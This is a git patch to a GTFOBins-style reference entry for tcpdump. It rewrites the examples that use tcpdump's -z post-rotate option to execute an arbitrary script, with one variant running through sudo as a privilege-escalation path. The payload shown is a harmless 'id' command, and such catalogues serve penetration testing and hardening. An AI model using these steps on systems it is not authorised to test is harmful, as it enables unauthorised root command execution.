From 2ff760e5605e6915a9ba100166645038a21534a6 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 19 Aug 2018 10:31:04 +0200 Subject: [PATCH] Fix and simplify tcpdump --- _gtfobins/tcpdump.md | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md index 5c2165e..aa3368a 100644 --- a/_gtfobins/tcpdump.md +++ b/_gtfobins/tcpdump.md @@ -1,9 +1,17 @@ --- functions: execute-non-interactive: - - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile - tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root - sudo-enabled: - - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile - sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root + - code: | + COMMAND='id > /tmp/output' + TF=$(mktemp -u) + echo "$COMMAND" > $TF + chmod +x $TF + tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF + suid-enabled: + - code: | + COMMAND='id > /tmp/output' + TF=$(mktemp -u) + echo "$COMMAND" > $TF + chmod +x $TF + sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF ---